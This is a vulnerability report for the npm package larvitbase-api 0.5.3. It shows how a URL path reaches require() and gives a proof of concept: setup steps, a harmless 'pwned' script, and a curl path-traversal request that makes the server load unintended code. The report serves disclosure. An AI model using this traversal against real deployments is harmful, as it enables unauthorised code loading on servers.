I would like to report an Unintended Require vulnerability in larvitbase-api.
It allows loading arbitrary non-production code (.js files).
module name: larvitbase-api
version: 0.5.3
npm page: https://www.npmjs.com/package/larvitbase-api
REST http API base framework based on larvitbase (https://github.com/larvit/larvitbase)
59 downloads in the last day
250 downloads in the last week
715 downloads in the last month
larvitbase-api is an HTTP server which dynamically loads some parts of its code with require(). Because the path of the required module partially depends on the URL (req.urlBase), anybody can cause code to load that was not intended to run on the server.
source code example:
https://github.com/larvit/larvitbase-api/blob/master/index.js#L183
req.routed = {
    controllerFullPath: path.join(altControllerPaths[i], req.urlBase) + '.js',
    controllerPath: req.urlBase
};
https://github.com/larvit/larvitbase-api/blob/master/index.js#L210
require(req.routed.controllerFullPath)(req, res, cb);
Detailed description of this bug can be found here: https://nodesecroadmap.fyi/chapter-1/threat-UIR.html
mkdir poc
cd poc/
npm i larvitbase-api
index.js (example code from https://www.npmjs.com/package/larvitbase-api)
const Api = require('larvitbase-api');
let api;
api = new Api({
'baseOptions': {'httpOptions': 8001},
'routerOptions': {},
'reqParserOptions': {},
});
api.start(function (err) {});
hack.js
console.log('pwned');
node index.js
curl --path-as-is 'http://localhost:8001/../../../../../../hack'
pwned
require(req.routed.controllerFullPath)(req, res, cb);
TypeError: require(...) is not a function
An attacker is able to control the x in require(x) and cause code to load that was not intended to run on the server.